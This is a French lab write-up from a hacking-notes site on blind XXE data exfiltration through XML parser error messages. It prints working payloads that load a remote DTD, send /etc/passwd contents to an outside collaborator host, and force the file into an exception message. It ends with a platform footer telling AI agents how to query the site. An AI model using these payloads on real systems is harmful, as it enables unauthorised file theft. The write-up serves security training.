> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/xxe/blind-xxe-data-exfiltration-via-error-messages.md).

# Filtrage de données XXE aveugle via messages d'erreur

### Exploitation du XXE aveugle pour récupérer des données via les messages d’erreur

Lab : La fonctionnalité Check stock analyse un XML sans afficher directement la réponse. L’objectif est d’utiliser une entité externe (DTD hébergée sur un serveur) pour provoquer une erreur qui affichera le contenu du `/etc/passwd` fichier dans le message d’exception. La technique consistant à forcer l’analyseur à inclure le contenu d’un fichier dans un URI inexistant est utilisée afin que l’exception révèle ce contenu.

* Le point d’entrée analyse le XML mais ne renvoie pas le résultat normalement.
* Le serveur autorise l’inclusion d’une DTD externe (hébergée sur le domaine d’exploitation).
* Le message d’erreur de l’analyseur contient suffisamment d’informations pour que, si la DTD provoque une référence mal formée incluant le contenu d’un fichier, ce contenu apparaisse dans l’exception.

#### Chargez une DTD externe hébergée sur le serveur pour fonctionner en ajoutant une `DOCTYPE` Déclaration pointant vers l’URL du serveur d’exploitation :

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % myFile SYSTEM "https://qf9v476vsapx2mqf01es1v7cu30xoncc.oastify.com"> %myFile;]>
<stockCheck>
<productId>
2
</productId>
<storeId>
1
</storeId>
</stockCheck>
```

{% endcode %}

<figure><img src="/files/8ec1ac86399971f2a79c9f64130e003ffa44cf37" alt=""><figcaption></figcaption></figure>

L’analyseur renvoie une erreur de type :/ `L’analyseur XML s’est terminé avec l’erreur : org.XML.sax.SAXParseException; systemId: https://qf9v476...; lineNumber: 1; columnNumber: 2; Les déclarations de balisage... doivent être bien formées.`

2. Tentative directe de lister `/etc/passwd` (problème : trop de lignes) :

```xml
<!ENTITY % file SYSTEM "file:////etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'https://rrmwg8iw4b1yen2gc2qtdwjd64c00qof.oastify.com/?content=%file;'>">
%eval;
%exfil;
```

<figure><img src="/files/99ec06c3fc84dc0839fea9e74b4e874822fdcd07" alt=""><figcaption></figcaption></figure>

3. Technique utilisée avec le contexte d’erreur — insérer le contenu du fichier dans une référence impossible pour forcer l’analyseur à l’afficher dans l’exception :

```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

En déclenchant la référence vers `file:///nonexistent/%file;`, l’analyseur génère une exception contenant le texte de la ressource incluse (`/etc/passwd`), ce qui permet d’exfiltrer le contenu malgré l’absence d’un retour normal au fonctionnement.

<figure><img src="/files/b0fff9dc482636aa7c8b47899e1bb7ca7b05d740" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/xxe/blind-xxe-data-exfiltration-via-error-messages.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
